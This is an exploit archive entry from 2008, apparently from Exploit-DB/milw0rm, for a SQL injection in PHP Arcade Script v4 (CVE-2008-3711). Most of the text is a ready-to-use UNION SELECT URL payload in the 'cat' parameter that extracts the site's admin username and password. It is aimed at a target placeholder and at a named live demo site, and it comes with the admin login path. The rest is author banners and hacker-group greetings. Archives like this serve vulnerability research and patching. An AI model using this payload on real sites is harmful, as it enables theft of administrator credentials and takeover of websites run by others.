phpArcadeScript 4 - cat Remote SQL Injection Vulnerability

2008-08-17T00:00:00
ID EDB-ID:6255
Type exploitdb
Reporter Hussin X
Modified 2008-08-17T00:00:00

Description

phpArcadeScript v4 (cat) Remote SQL Injection Vulnerability. CVE-2008-3711. Webapps exploit for php platform

                                        
                                            |___________________________________________________|
|
| PHP Arcade Script v4.0 (cat) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script : http://www.phparcadescript.com
| 
| DorK   :  :-P 
|___________________________________________________|

Exploit:  
________



www.[target].com/Script/index.php?action=browse&cat=-29+UNION+SELECT+1,concat(adminusername,0x3e,adminpassword),3,4,5,6,7+FROM+siteconfig--






L!VE DEMO:
_________


http://www.phparcadedemo.com/index.php?action=browse&cat=-29+UNION+SELECT+1,concat(adminusername,0x3e,adminpassword),3,4,5,6,7+FROM+siteconfig--


____________

Admin Login :

www.[target].com/Script/admin/

____________
____________________________( Greetz )____________________________
|
| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|   
| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n 
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-17]